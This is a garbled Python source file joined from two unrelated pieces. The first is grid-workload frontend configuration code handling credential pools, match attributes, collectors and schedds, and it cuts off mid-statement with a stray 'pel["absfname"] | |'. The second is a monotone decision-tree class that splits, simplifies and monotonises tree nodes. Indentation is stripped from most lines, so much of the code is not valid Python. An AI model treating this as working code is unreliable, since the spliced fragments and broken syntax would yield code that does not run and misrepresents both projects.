    width = credential["pool_idx_len"]
    width = 0 if width is None else int(width)
    expanded = []
    for token in credential["pool_idx_list"].split(","):
        if "-" in token:
            # "lo-hi" range: emit every index in the inclusive range
            bounds = token.split("-")
            expanded.extend(str(v) for v in range(int(bounds[0]), int(bounds[1]) + 1))
        else:
            expanded.append(token.strip())
    return [entry.zfill(width) for entry in expanded]
def match_attrs_to_array(match_attrs):
    """Convert a match_attrs mapping into a list of (name, type-code) tuples.

    Args:
        match_attrs: mapping of attribute name to a dict with a "type" key
            (one of the MATCH_ATTR_CONV keys)

    Returns:
        list: (str name, one-letter type code) tuples, in mapping order

    Raises:
        RuntimeError: if an attribute declares an unknown type
    """
    converted = []
    for name in list(match_attrs.keys()):
        declared_type = match_attrs[name]["type"]
        if declared_type not in MATCH_ATTR_CONV:
            raise RuntimeError(f"match_attr type '{declared_type}' not one of {list(MATCH_ATTR_CONV.keys())}")
        converted.append((str(name), MATCH_ATTR_CONV[declared_type]))
    return converted
# In 5345 there was an additional parameter but it was not used in the function:
# def populate_common_descript(descript_dict, params, attrs_dict):
# attrs_dict: dictionary of attributes to expand attributes (but expansion is handles later)
def populate_common_descript(descript_dict, params):
"""Populate info common for both frontend (global) and group in the descript dict.
descript_dict will be modified in this function
Args:
descript_dict (dict): description dictionary, modified in this function (side effect)
params: params or sub_params from the config file
"""
if params.match.policy_file:
policy_module = MatchPolicy(params.match.policy_file)
# Populate the descript_dict
descript_dict.add("MatchPolicyFile", params.match.policy_file)
descript_dict.add("MatchPolicyModuleFactoryMatchAttrs", match_attrs_to_array(policy_module.factoryMatchAttrs))
descript_dict.add("MatchPolicyModuleJobMatchAttrs", match_attrs_to_array(policy_module.jobMatchAttrs))
descript_dict.add("MatchPolicyModuleFactoryQueryExpr", policy_module.factoryQueryExpr)
descript_dict.add("MatchPolicyModuleJobQueryExpr", policy_module.jobQueryExpr)
for tel in (("factory", "Factory"), ("job", "Job")):
param_tname, str_tname = tel
qry_expr = params.match[param_tname]["query_expr"]
descript_dict.add("%sQueryExpr" % str_tname, qry_expr)
ma_arr = match_attrs_to_array(params.match[param_tname]["match_attrs"])
descript_dict.add("%sMatchAttrs" % str_tname, repr(ma_arr))
if params.security.security_name is not None:
descript_dict.add("SecurityName", params.security.security_name)
collectors = []
for el in params.match.factory.collectors:
if el["factory_identity"][-9:] == "@fake.org":
raise RuntimeError("factory_identity for %s not set! (i.e. it is fake)" % el["node"])
if el["my_identity"][-9:] == "@fake.org":
raise RuntimeError("my_identity for %s not set! (i.e. it is fake)" % el["node"])
cWDictFile.validate_node(el["node"])
collectors.append((el["node"], el["factory_identity"], el["my_identity"]))
descript_dict.add("FactoryCollectors", repr(collectors))
schedds = []
for el in params.match.job.schedds:
cWDictFile.validate_node(el["fullname"])
schedds.append(el["fullname"])
descript_dict.add("JobSchedds", ",".join(schedds))
if params.security.proxy_selection_plugin is not None:
descript_dict.add("ProxySelectionPlugin", params.security.proxy_selection_plugin)
descript_dict.add("IDTokenLifetime", getattr(params.security, "idtoken_lifetime", 24))
if len(params.security.credentials) > 0:
proxies = []
# TODO: absfname - Moving from absfname to name to identify the credential - fix the duplications
# absfname should go in the proxy_attr_names, name should be removed because used as key
proxy_attr_names = {
"security_class": "ProxySecurityClasses",
"trust_domain": "ProxyTrustDomains",
"type": "ProxyTypes",
# credential files probably should be handles as a list, each w/ name and path
# or the attributes ending in _file are files
# "file": "CredentialFiles", # placeholder for when name will not be absfname
"generator": "CredentialGenerators",
"keyabsfname": "ProxyKeyFiles",
"pilotabsfname": "ProxyPilotFiles",
"remote_username": "ProxyRemoteUsernames",
"vm_id": "ProxyVMIds",
"vm_type": "ProxyVMTypes",
"creation_script": "ProxyCreationScripts",
"project_id": "ProxyProjectIds",
"update_frequency": "ProxyUpdateFrequency",
}
# translation of attributes that can be added to the base type (name in list -> attribute name)
proxy_attr_type_list = {
"vm_id": "vm_id",
"vm_type": "vm_type",
"username": "remote_username",
"project_id": "project_id",
}
# TODO: this list is used for loops, replace with "for i in proxy_attr_names"
proxy_attrs = list(proxy_attr_names.keys())
proxy_descript_values = {}
for attr in proxy_attrs:
proxy_descript_values[attr] = {}
proxy_trust_domains = {} # TODO: not used, remove
# print params.security.credentials
for pel in params.security.credentials:
validate_credential_type(pel["type"])
if pel["absfname"] is None:
if pel["generator"] is None:
raise RuntimeError("All credentials without generator need a absfname!")
else:
# TODO: absfname - use name instead
pel["absfname"] | |
self.children_left[0:self.num_nodes]=sklearn_tree_.children_left
self.children_right[0:self.num_nodes]=sklearn_tree_.children_right
self.values[0:self.num_nodes,:]=sklearn_tree_.value[:,0,:]
self.sample_weight[0:self.num_nodes]=np.sum(self.values[0:self.num_nodes,:],axis=1)
cum_sum=np.zeros(self.num_nodes,dtype=np.float64)
for i_class in np.arange(num_classes-1):
cum_sum=cum_sum+self.values[0:self.num_nodes,i_class]
self.cdf_data[0:self.num_nodes,i_class]=cum_sum/self.sample_weight[0:self.num_nodes]
self.cdf=self.cdf_data.copy()
self.pred_class[0:self.num_nodes]=np.argmax(self.cdf[0:self.num_nodes,:]>=0.5, axis=1)
# get tree corners
leaf_ids = np.zeros([self.assumed_max_nodes], dtype=np.int32)-99
upper_corners = np.ones(
[self.assumed_max_nodes, num_feats], dtype=np.float64,order='C') * RULE_UPPER_CONST
lower_corners = np.ones(
[self.assumed_max_nodes, num_feats], dtype=np.float64,order='C') * RULE_LOWER_CONST
isoensemble.extract_rules_from_tree_c(sklearn_tree_.children_left.astype(np.int32),sklearn_tree_.children_right.astype(np.int32),sklearn_tree_.feature.astype(np.int32),sklearn_tree_.threshold.astype(np.float64), np.int32(num_feats), leaf_ids,upper_corners,lower_corners)
self.upper_corners=upper_corners
self.lower_corners=lower_corners
self.leaf_ids_obj=LeafIDs(leaf_ids!=-99)# leaf_ids[leaf_ids!=-99]
self.peak_leaves=self.leaf_ids_obj.curr_size #len(self.leaf_ids)
self.set_mt_feats(incr_feats,decr_feats)
self.normalise_nmt_nodes=normalise_nmt_nodes
self.split_criterion=split_criterion
self.split_class=split_class
self.split_weight=split_weight
self.min_split_weight=min_split_weight
# populate with training data
self.train_X=train_X
self.train_y=train_y
self.train_sample_weight=train_sample_weight
self.node_train_idx=np.zeros([self.assumed_max_nodes,train_X.shape[0]],dtype=np.int32)-99
self.node_train_num=np.zeros([self.assumed_max_nodes],dtype=np.int32)
isoensemble.populate_nodes_c(self.features,
self.thresholds,
self.values,
self.children_left,
self.children_right,
self.train_X.astype(np.float64),
self.train_y,
self.node_train_idx,
self.node_train_num)
self.univariate_distns=univariate_distns
self.free_node_ids=np.zeros(1500,dtype=np.int32)
self.free_node_ids_num=0
self.free_node_ids_num_arr_=np.zeros(1,dtype=np.int32)
self.num_nodes_arr_=np.zeros(1,dtype=np.int32)
self.l_curr_size_=np.zeros(1,dtype=np.int32)
self.done_normalising=False
return
def trim_to_size(self):
self.free_node_ids=None
self.free_node_ids_num=0
self.train_X=None
self.train_y=None
self.node_train_idx=self.node_train_idx[0:self.num_nodes,:]
self.node_train_num=self.node_train_num[0:self.num_nodes]
self.features=self.features[0:self.num_nodes]
self.thresholds=self.thresholds[0:self.num_nodes]
self.children_left=self.children_left[0:self.num_nodes]#np.zeros([self.assumed_max_nodes],dtype=np.int32)
self.children_right=self.children_right[0:self.num_nodes]#np.zeros([self.assumed_max_nodes],dtype=np.int32)
self.values=self.values[0:self.num_nodes,:]#np.zeros([self.assumed_max_nodes,num_classes],dtype=np.float64)
self.cdf_data=self.cdf_data[0:self.num_nodes,:]#np.ones([self.assumed_max_nodes,num_classes],dtype=np.float64)
self.cdf=self.cdf[0:self.num_nodes,:]#np.ones([self.assumed_max_nodes,num_classes],dtype=np.float64)
self.sample_weight=self.sample_weight[0:self.num_nodes]#np.zeros([self.assumed_max_nodes],dtype=np.float64)
self.pred_class=self.pred_class[0:self.num_nodes]
return
    def set_mt_feats(self,incr_feats,decr_feats):
        """Record which features are monotone increasing/decreasing.

        Feature numbers are 1-based on input and converted here to 0-based
        column indices. Sets in_feats, de_feats, mt_feats, nmt_feats and the
        per-feature direction vector mt_feat_types (+1 increasing,
        -1 decreasing, 0 non-monotone).

        NOTE(review): the `or` condition means a call with exactly one of
        incr_feats/decr_feats set to None reaches np.asarray(None)-1 and
        fails; callers appear to pass both or neither - confirm.
        NOTE(review): when both are None, none of these attributes is set.
        """
        if incr_feats is not None or decr_feats is not None :
            # convert from 1-based feature numbers to 0-based column indices
            self.in_feats=np.asarray(incr_feats)-1
            self.de_feats=np.asarray(decr_feats)-1
            mt_feats=list(self.in_feats).copy()
            for i in np.arange(len(self.de_feats)): mt_feats.append(self.de_feats[i])
            self.mt_feats=mt_feats
            # non-monotone features are the complement of the monotone set
            self.nmt_feats=np.asarray([f for f in np.arange(self.num_feats) if f not in mt_feats])
            self.mt_feat_types=np.zeros(self.num_feats,dtype=np.int32)
            if len(self.in_feats)>0:
                self.mt_feat_types[self.in_feats]=+1
            if len(self.de_feats)>0:
                self.mt_feat_types[self.de_feats]=-1
def get_increasing_leaf_node_pairs(self):
#probs,lowers,uppers=self.get_corner_matrices()
max_pairs=int(np.round(self.lower_corners.shape[0]*self.lower_corners.shape[0]))
incr_pairs=np.zeros([max_pairs,2],dtype=np.int32)
n_pairs_new=isoensemble.get_increasing_leaf_node_pairs_array(self.lower_corners,self.upper_corners,self.leaf_ids_obj.get_idx_array(),self.mt_feat_types,incr_pairs)
#incr_pairs_old=self.get_increasing_leaf_node_pairs_simple()
return incr_pairs[0:n_pairs_new,:]
def eliminate_unnecessary_incr_pairs(self,pm_pairs):
# G=nx.DiGraph()
# #G.add_nodes_from(np.arange(np.max(self.leaf_ids_obj.get_idx_array())+1,dtype='int'))
# G.add_edges_from(pm_pairs)
# remove_redundant_edges(G)
# res=G.edges().copy()
# return res
# faster cython immplementation
# first reduce number of leaves
# uniq_leaves=np.unique(pm_pairs)
# lkp=dict()
# rev_lkp=dict()
# for i in np.arange(len(uniq_leaves)):
# lkp[uniq_leaves[i]]=i
# rev_lkp[i]=uniq_leaves[i]
# pm_pairs_sequenced=np.zeros(pm_pairs.shape,dtype=np.int32)
# for i in np.arange(pm_pairs.shape[0]):
# pm_pairs_sequenced[i,0]= lkp[pm_pairs[i,0]]
# pm_pairs_sequenced[i,1]= lkp[pm_pairs[i,1]]
if len(pm_pairs)==0:
return pm_pairs
else:
out_pm_pairs=np.zeros(pm_pairs.shape,dtype=np.int32)
num_pairs=isoensemble.calculate_transitive_reduction_c(pm_pairs,out_pm_pairs)
out_pm_pairs=out_pm_pairs[0:num_pairs,:]
out_pm_pairs_w=np.zeros(pm_pairs.shape,dtype=np.int32)
num_pairs=isoensemble.calculate_transitive_reduction_c_warshal(pm_pairs,out_pm_pairs_w)
out_pm_pairs_w=out_pm_pairs_w[0:num_pairs,:]
return out_pm_pairs
# for i in np.arange(out_pm_pairs.shape[0]):
# out_pm_pairs[i,0]= rev_lkp[out_pm_pairs[i,0]]
# out_pm_pairs[i,1]= rev_lkp[out_pm_pairs[i,1]]
def get_non_monotone_pairs(self,pm_pairs):
nmt_pairs=[]
for pair in pm_pairs:
#if self.leaf_nodes[pair[0]].predicted_class>self.leaf_nodes[pair[1]].predicted_class:
if self.pred_class[pair[0]]>self.pred_class[pair[1]]:
nmt_pairs.append(pair)
return nmt_pairs
def clean_monotone_island_pairs(self,pm_pairs_clean,nmt_pairs):
graph=nx.DiGraph()
graph.add_edges_from(pm_pairs_clean)
ud_graph=graph.to_undirected()
nodes_with_constraints =set(graph.nodes())
unchecked_nodes=nodes_with_constraints.copy()
polluted_nodes=set(np.unique(np.ravel(np.asarray(nmt_pairs))))
safe_island_nodes_to_remove=[]#set()
for n in graph.nodes():
if graph.predecessors(n) == []: # root node #successors(n)
if n in unchecked_nodes:
nodes=set(nx.descendants(ud_graph,n))
has_no_nmt_polluted_nodes = len(nodes.intersection(polluted_nodes))==0
if has_no_nmt_polluted_nodes:
safe_island_nodes_to_remove=safe_island_nodes_to_remove+ list(nodes) + [n]
unchecked_nodes.difference_update(nodes)
unchecked_nodes.difference_update([n])
cleaned_edges=nx.DiGraph()
for edge in pm_pairs_clean:
if edge[0] not in safe_island_nodes_to_remove :
cleaned_edges.add_edge(edge[0],edge[1])
return cleaned_edges.edges()
def get_next_free_node_ids(self,number=1):
results=np.zeros(number,dtype=np.int32)
#num_to_add=0
for i in np.arange(number):
idx=self.free_node_ids_num-1
if idx>=0:
results[i]=self.free_node_ids[idx]
self.free_node_ids_num=self.free_node_ids_num-1
else:
results[i]=self.num_nodes#num_to_add
#num_to_add=num_to_add+1
self.num_nodes=self.num_nodes+1
return results
def return_free_node_id(self,node_id):
#results=np.zeros(number,dtype=np.int32)
#num_to_add=0
self.free_node_ids[self.free_node_ids_num]=node_id
self.free_node_ids_num=self.free_node_ids_num+1
return
# i=0
# while self.children_left[i]!=0:
# i=i+1
#
# first=i
# i=i+1
# while self.children_left[i]!=0:
# i=i+1
# return [first,i]
def grow_segregated_nodes(self,node_to_grow,node_to_intersect_with):
if self.split_weight not in ['hybrid_prob' ,'prob_empirical_cond','hybrid_prob_empirical_orig_train' ]: #,'hybrid_prob_empirical'
self.free_node_ids_num_arr_[0]=self.free_node_ids_num
self.num_nodes_arr_[0]=self.num_nodes
self.l_curr_size_[0]=self.leaf_ids_obj.curr_size
change_made=isoensemble.grow_segregated_nodes_c(node_to_grow,
node_to_intersect_with,
self.free_node_ids,
self.free_node_ids_num_arr_,
self.num_nodes_arr_,
sc_dict[self.split_criterion],
self.sample_weight,
self.min_split_weight,
sw_dict[self.split_weight],
self.lower_corners,
self.upper_corners,
self.node_train_num,
self.node_train_idx,
self.assumed_max_nodes,
self.train_X,
self.train_y,
self.num_classes,
self.train_sample_weight,
self.features,
self.thresholds,
self.children_left,
self.children_right,
self.values,
self.cdf_data,
self.cdf,
self.pred_class,
self.leaf_ids_obj.leaf_index,
self.leaf_ids_obj.leaf_array,
self.l_curr_size_,
self.univar_vals,
self.univar_probs,
self.univar_vals_num
)==1
# restore values passed by proxy array
self.free_node_ids_num=self.free_node_ids_num_arr_[0]
self.num_nodes=self.num_nodes_arr_[0]
self.leaf_ids_obj.curr_size=self.l_curr_size_[0]
# refresh leaf ids object
#self.leaf_ids_obj=LeafIDs(self.children_left==TREE_LEAF)
else: # old way
#for node_to_grow,l2 in [[leafnode1,leafnode2],[leafnode2,leafnode1]]:
l1=node_to_grow
l2=node_to_intersect_with
change_made=False
[temp_split_left_node_id,temp_split_right_node_id]=self.get_next_free_node_ids(2)
split_decision=False
if self.split_criterion=='both_sides_have_min_sample_wgt' and self.sample_weight[l1]<2*self.min_split_weight: # there is no way to split this node, stop
pass
else:
#feats=list(self.nmt_feats) + list( self.mt_feats) # should result in less splits (and nodes) if we split on NMT feats first
for i_feat in np.arange(self.num_feats): #feats: # np.arange(len(l1.corner_lower)): #self.mt_feats:# np.arange(len(l1.corner_lower)):
for dirn in ['left','right']:
split_val=-99e9
if self.split_weight!='univar_prob_distn' or (self.split_weight=='univar_prob_distn' and l1.size>0.000005): # don't split when it gets too small!!
if dirn=='right':
#if l1.corner_lower[i_feat]<l2.corner_lower[i_feat] and l1.corner_upper[i_feat]>l2.corner_lower[i_feat] : # slice off bottom bit
if self.lower_corners[l1,i_feat]<self.lower_corners[l2,i_feat] and self.upper_corners[l1,i_feat]>self.lower_corners[l2,i_feat] : # slice off bottom bit
split_val=self.lower_corners[l2,i_feat]
else: # left
#if l1.corner_upper[i_feat]>l2.corner_upper[i_feat] and l1.corner_lower[i_feat]<l2.corner_upper[i_feat] :
if self.upper_corners[l1,i_feat]>self.upper_corners[l2,i_feat] and self.lower_corners[l1,i_feat]<self.upper_corners[l2,i_feat] :
split_val=self.upper_corners[l2,i_feat]
if split_val!=-99e9: # need to split on this feat value
# work out which points go where for this proposed split
#temp_split_left_node_id=self.num_nodes
#temp_split_right_node_id=self.num_nodes+1
self.node_train_num[temp_split_left_node_id]=0
self.node_train_num[temp_split_right_node_id]=0
self.sample_weight[temp_split_left_node_id]=0.
self.sample_weight[temp_split_right_node_id]=0.
for i_ in np.arange(self.node_train_num[l1]):
i=self.node_train_idx[l1,i_]
if self.train_X[i,i_feat]<=split_val:
self.node_train_idx[temp_split_left_node_id,self.node_train_num[temp_split_left_node_id]]=i
self.node_train_num[temp_split_left_node_id]=self.node_train_num[temp_split_left_node_id]+1
self.sample_weight[temp_split_left_node_id]=self.sample_weight[temp_split_left_node_id]+self.train_sample_weight[i]
else:
self.node_train_idx[temp_split_right_node_id,self.node_train_num[temp_split_right_node_id]]=i
self.node_train_num[temp_split_right_node_id]=self.node_train_num[temp_split_right_node_id]+1
self.sample_weight[temp_split_right_node_id]=self.sample_weight[temp_split_right_node_id]+self.train_sample_weight[i]
# adjust child sample weights if required
if self.split_weight=='parent_weight':
self.sample_weight[temp_split_left_node_id]=self.sample_weight[l1]
self.sample_weight[temp_split_right_node_id]=self.sample_weight[l1]
elif self.split_weight=='contained_pts_weight':
pass # sample weights already correctly set
#self.sample_weight[temp_split_left_node_id]=self.sample_weight[temp_split_left_node_id]#np.max([0.5,self.sample_weight[temp_split_left_node_id]])
#self.sample_weight[temp_split_right_node_id]=self.sample_weight[temp_split_right_node_id]#np.max([0.5,self.sample_weight[temp_split_right_node_id]])
elif self.split_weight=='hybrid_prob' or self.split_weight=='hybrid_prob_empirical' or self.split_weight=='prob_empirical_cond' or self.split_weight=='hybrid_prob_empirical_orig_train' :
if self.sample_weight[temp_split_left_node_id]==0. or self.sample_weight[temp_split_right_node_id]==0.:
if self.split_weight=='prob_empirical_cond':
#[dist_vals,dist_probs]=self.univariate_distns[l1.predicted_class][i_feat]
raise NotImplemented
else:
[dist_vals,dist_probs]=self.univariate_distns[i_feat]
left_extents=[self.lower_corners[l1,i_feat],split_val]
right_extents=[split_val,self.upper_corners[l1,i_feat]]
#left_extents=[l1.corner_lower[i_feat],split_val]
#right_extents=[split_val,l1.corner_upper[i_feat]]
prob_left=calc_probability(dist_vals,dist_probs,left_extents[0],left_extents[1])
prob_right=calc_probability(dist_vals,dist_probs,right_extents[0],right_extents[1])
self.sample_weight[temp_split_left_node_id]=self.sample_weight[l1]*prob_left/(prob_left+prob_right)
self.sample_weight[temp_split_right_node_id]=self.sample_weight[l1]*prob_right/(prob_left+prob_right)
elif self.split_weight=='univar_prob_distn':
raise NotImplemented
# make decision to split or not
if self.split_criterion=='both_sides_have_pts':
split_decision=self.sample_weight[temp_split_left_node_id]>0 and self.sample_weight[temp_split_right_node_id]>0
elif self.split_criterion=='incomp_side_has_pts' : #len(indx_left)>0 and len(indx_right)>0 : #CHANGE FROM SOLVED VERSION 10/4/17: (len(indx_left)>0 and dirn=='right') or (len(indx_right)>0 and dirn=='left') :
if dirn=='right':
split_decision=self.sample_weight[temp_split_left_node_id]>0
else: # left
split_decision=self.sample_weight[temp_split_right_node_id]>0
elif self.split_criterion=='both_sides_have_min_sample_wgt' : #len(indx_left)>0 and len(indx_right)>0 : #CHANGE FROM SOLVED VERSION 10/4/17: (len(indx_left)>0 and dirn=='right') or (len(indx_right)>0 and dirn=='left') :
split_decision=self.sample_weight[temp_split_left_node_id]>=self.min_split_weight and self.sample_weight[temp_split_right_node_id]>=self.min_split_weight
else: #if self.split_criterion=='all_splits_ok' :
split_decision=True
# split if so decided
if split_decision:
change_made=True
self.features[l1]=i_feat
self.thresholds[l1]=split_val
self.children_left[l1]=temp_split_left_node_id
self.children_right[l1]=temp_split_right_node_id
self.children_left[temp_split_left_node_id]=TREE_LEAF
self.children_right[temp_split_left_node_id]=TREE_LEAF
self.children_left[temp_split_right_node_id]=TREE_LEAF
self.children_right[temp_split_right_node_id]=TREE_LEAF
#self.num_nodes=np.max([temp_split_left_node_id+1,temp_split_right_node_id+1,self.num_nodes])
#self.free_node_ids[self.free_node_ids_num-1]=-99
#self.free_node_ids[self.free_node_ids_num-2]=-99
#self.free_node_ids_num=np.max([0,self.free_node_ids_num-2
for i_ in np.arange(self.node_train_num[temp_split_left_node_id]):
i=self.node_train_idx[temp_split_left_node_id,i_]
self.values[temp_split_left_node_id,self.train_y[i]]=self.values[temp_split_left_node_id,self.train_y[i]]+self.train_sample_weight[i]
for i_ in np.arange(self.node_train_num[temp_split_right_node_id]):
i=self.node_train_idx[temp_split_right_node_id,i_]
self.values[temp_split_right_node_id,self.train_y[i]]=self.values[temp_split_right_node_id,self.train_y[i]]+self.train_sample_weight[i]
#self.values=np.zeros([self.assumed_max_nodes,num_classes],dtype=np.float64)
cum_sum=0.
for i_class in np.arange(self.num_classes):
cum_sum=cum_sum+self.values[temp_split_left_node_id,i_class]
self.cdf_data[temp_split_left_node_id,i_class]=cum_sum
if cum_sum>0:
self.cdf_data[temp_split_left_node_id,:]=self.cdf_data[temp_split_left_node_id,:]/cum_sum
cum_sum=0.
for i_class in np.arange(self.num_classes):
cum_sum=cum_sum+self.values[temp_split_right_node_id,i_class]
self.cdf_data[temp_split_right_node_id,i_class]=cum_sum
if cum_sum>0:
self.cdf_data[temp_split_right_node_id,:]=self.cdf_data[temp_split_right_node_id,:]/cum_sum
self.cdf[temp_split_left_node_id,:]=self.cdf[l1,:]#.copy()
self.cdf[temp_split_right_node_id,:]=self.cdf[l1,:]#.copy()
#self.sample_weight=np.zeros([self.assumed_max_nodes],dtype=np.float64)
self.pred_class[temp_split_left_node_id]=self.pred_class[l1]#np.argmax(self.cdf[temp_split_left_node_id,:]>=0.5, axis=0)
self.pred_class[temp_split_right_node_id]=self.pred_class[l1]#np.argmax(self.cdf[temp_split_right_node_id,:]>=0.5, axis=0)
self.lower_corners[temp_split_left_node_id,:]=self.lower_corners[l1,:]
self.lower_corners[temp_split_right_node_id,:]=self.lower_corners[l1,:]
self.upper_corners[temp_split_left_node_id,:]=self.upper_corners[l1,:]
self.upper_corners[temp_split_right_node_id,:]=self.upper_corners[l1,:]
self.upper_corners[temp_split_left_node_id,i_feat]=split_val
self.lower_corners[temp_split_right_node_id,i_feat]=split_val
self.leaf_ids_obj.replace_leaf_with_chn(l1,temp_split_left_node_id,temp_split_right_node_id)
#leaf_ids_=list(self.leaf_ids)
#leaf_ids_.remove(l1)
#leaf_ids_=leaf_ids_+[temp_split_left_node_id,temp_split_right_node_id]
#self.leaf_ids=np.asarray(leaf_ids_)
#l1.left.resubst_err_node=l1.resubst_err_node #np.sum(self.sample_weight[indx_left])/self.sample_weight_total*(1-np.max(node.left.probabilities))
#l1.right.resubst_err_node=l1.resubst_err_node #np.sum(self.sample_weight[indx_right])/self.sample_weight_total*(1-np.max(node.right.probabilities))
# move to child to follow
[temp_split_left_node_id,temp_split_right_node_id]=self.get_next_free_node_ids(2)
#print(self.num_nodes)
l1=self.children_left[l1] if dirn=='left' else self.children_right[l1]
self.return_free_node_id(temp_split_left_node_id)
self.return_free_node_id(temp_split_right_node_id)
# update peak leaves if required
num_leaves=self.leaf_ids_obj.curr_size#len(self.leaf_ids)
if num_leaves>self.peak_leaves:
self.peak_leaves=num_leaves
return change_made
def get_pairs_to_split(self,pm_pairs_clean,nmt_pairs,normalise_nmt_nodes):
if self.normalise_nmt_nodes==0:
pairs_to_split=[] #if normalise_nmt_nodes==1 else pm_pairs_clean
elif self.normalise_nmt_nodes==1:
pairs_to_split=nmt_pairs
elif self.normalise_nmt_nodes==2:
pairs_to_split=pm_pairs_clean
elif self.normalise_nmt_nodes==3:
raise NotImplemented()
return pairs_to_split
def get_leaf_id_pairs(self,cleaned_pairs):
# lookup=np.zeros(np.max(self.leaf_ids_obj.get_idx_array())+1,dtype=np.int32)
#
# l_=0
# for l in self.leaf_ids_obj.get_idx_array():
# lookup[l]=l_
# l_=l_+1
# leaf_id_pairs=[]
# for pair in cleaned_pairs:
# leaf_id_pairs=leaf_id_pairs+[(lookup[pair[0]],lookup[pair[1]])]
#return leaf_id_pairs
pairs=np.asarray(cleaned_pairs,dtype=np.int32)
if pairs.shape[0]>0:
out_seq_pairs=np.zeros(pairs.shape,dtype=np.int32)
leaf_ids=self.leaf_ids_obj.get_idx_array()
isoensemble.get_leaf_id_pairs_c(pairs,leaf_ids,out_seq_pairs)
return out_seq_pairs
# def recalculate_leaf_ids(self):
# leaf_ids=np.zeros(2000,dtype=np.int32)
# num_leaves=0
# for node_id in np.arange(self.num_nodes):
# if self.children_left[node_id]==TREE_LEAF:
# leaf_ids[num_leaves]=node_id
# num_leaves=num_leaves+1
# self.leaf_ids=leaf_ids[0:num_leaves]
# max_leaf_id=self.num_nodes
# while self.children_left[max_leaf_id]==0:
# max_leaf_id=max_leaf_id-1
# #self.num_nodes=max_leaf_id
# if num_leaves>self.peak_leaves:
# self.peak_leaves=num_leaves
# #print(self.num_nodes)
    # find any pairs of child nodes with a common parent and the same predicted class. If found, fuse the parent.
    # returns the number of nodes fused (0 if none were fused).
def simplify_old(self,node_id=None):
if node_id is None: node_id=0
res=self.simplify_recurse(node_id)
self.recalculate_leaf_ids()
return res
    def simplify_recurse(self,node_id=None):
        """Recursively fuse parents of same-class leaf pairs under ``node_id``.

        Walks the subtree rooted at ``node_id`` (the root when None).  When
        both children of a node are leaves predicting the same class, the
        parent becomes a leaf and both child slots are zeroed and pushed onto
        the free-node-id stack.  Returns the number of parents fused.

        NOTE(review): unlike ``simplify``, this path does not touch
        ``leaf_ids_obj``; its caller (``simplify_old``) rebuilds the leaf
        bookkeeping afterwards -- confirm before reusing it elsewhere.
        """
        if node_id is None: node_id=0
        if self.children_left[node_id]==TREE_LEAF:
            return 0
        else:
            left_id=self.children_left[node_id]
            right_id=self.children_right[node_id]
            if self.children_left[left_id]==TREE_LEAF and self.children_left[right_id]==TREE_LEAF: # this is an immediate parent node
                if self.pred_class[left_id]==self.pred_class[right_id]:
                    # Fuse: the parent becomes a leaf ...
                    self.children_left[node_id]=TREE_LEAF
                    self.children_right[node_id]=TREE_LEAF
                    # ... and both children are zeroed out (0 marks a freed
                    # slot, distinct from TREE_LEAF).
                    self.children_left[left_id]=0#TREE_LEAF
                    self.children_left[right_id]=0#TREE_LEAF
                    self.children_right[left_id]=0
                    self.children_right[right_id]=0
                    # Return both child ids to the free pool for reuse.
                    self.free_node_ids[self.free_node_ids_num]=left_id
                    self.free_node_ids_num=self.free_node_ids_num+1
                    self.free_node_ids[self.free_node_ids_num]=right_id
                    self.free_node_ids_num=self.free_node_ids_num+1
                    return 1
                else:
                    return 0
            else: # at least one child is internal: recurse into both subtrees
                res_left=self.simplify_recurse(self.children_left[node_id])
                res_right=self.simplify_recurse(self.children_right[node_id])
                return res_left+res_right
    # find any pairs of child nodes with a common parent and the same predicted class. If found, fuse the parent.
    # returns the number of nodes fused (0 if none were fused).
def simplify(self):
num_fuses=0
for node_id in np.arange(self.num_nodes):
if self.children_left[node_id]!= TREE_LEAF and self.children_left[node_id]!= 0:
left_id=self.children_left[node_id]
right_id=self.children_right[node_id]
if self.children_left[left_id]==TREE_LEAF and self.children_left[right_id]==TREE_LEAF: # this is an immediate parent node
if self.pred_class[left_id]==self.pred_class[right_id]:
self.children_left[node_id]=TREE_LEAF
self.children_right[node_id]=TREE_LEAF
self.children_left[left_id]=0#TREE_LEAF
self.children_left[right_id]=0#TREE_LEAF
self.children_right[left_id]=0
self.children_right[right_id]=0
self.leaf_ids_obj.fuse_branch(left_id,right_id,node_id)
self.free_node_ids[self.free_node_ids_num]=left_id
self.free_node_ids_num=self.free_node_ids_num+1
self.free_node_ids[self.free_node_ids_num]=right_id
self.free_node_ids_num=self.free_node_ids_num+1
num_fuses=num_fuses+1
#self.recalculate_leaf_ids()
return num_fuses
def monotonise(self,sample_reweights=None,univar_vals=None,univar_probs=None,univar_vals_num=None):
self.univar_vals=univar_vals
self.univar_probs=univar_probs
self.univar_vals_num=univar_vals_num
#self.univariate_distns=univariate_distns
# get increasing pairs
pm_pairs=self.get_increasing_leaf_node_pairs()
pm_pairs_clean=self.eliminate_unnecessary_incr_pairs(pm_pairs)
nmt_pairs=self.get_non_monotone_pairs(pm_pairs_clean)
# decide on pair to split
pairs_to_split=self.get_pairs_to_split(pm_pairs_clean,nmt_pairs,self.normalise_nmt_nodes)
#pairs_to_split=self.get_non_monotone_pairs_extended(nmt_pairs,pm_pairs_clean)
# stop if already monotone
if nmt_pairs==[]: # already monotone
return 0
# grow segregated nodes if requested
if self.normalise_nmt_nodes>0 and not self.done_normalising:
self.done_normalising=True
keep_going=True
while keep_going:
keep_going=False
change_made=False
changed_nodes=[]
#pairs_to_split=nmt_pairs if normalise_nmt_nodes==1 else pm_pairs_clean
for pair in pairs_to_split:
if pair[0] not in changed_nodes and pair[1] not in changed_nodes : # this filter seems a tad slower and hence complexity is not warranted
change_made1=self.grow_segregated_nodes(pair[0],pair[1])
change_made2=self.grow_segregated_nodes(pair[1],pair[0])
if change_made1: changed_nodes.append(pair[0])
if change_made2: changed_nodes.append(pair[1])
change_made=change_made or change_made1 or change_made2
if change_made:
#self.number_nodes()
#print(' now: ' + str(len(self.leaf_nodes)))
pm_pairs=self.get_increasing_leaf_node_pairs()
pm_pairs_clean=self.eliminate_unnecessary_incr_pairs(pm_pairs)
nmt_pairs=self.get_non_monotone_pairs(pm_pairs_clean)
pairs_to_split=self.get_pairs_to_split(pm_pairs_clean,nmt_pairs,self.normalise_nmt_nodes) #nmt_pairs if normalise_nmt_nodes==1 else pm_pairs_clean
keep_going=True
# monotonise the cdf
cleaned_pairs=self.clean_monotone_island_pairs(pm_pairs_clean,nmt_pairs)
if sample_reweights is not None:
raise NotImplemented
# weights=self.get_leaf_sizes()
# else:
# weights=self.recalc_leaf_sizes(sample_reweights)
leaf_id_pairs=self.get_leaf_id_pairs(cleaned_pairs)
leaf_ids_=self.leaf_ids_obj.get_idx_array()
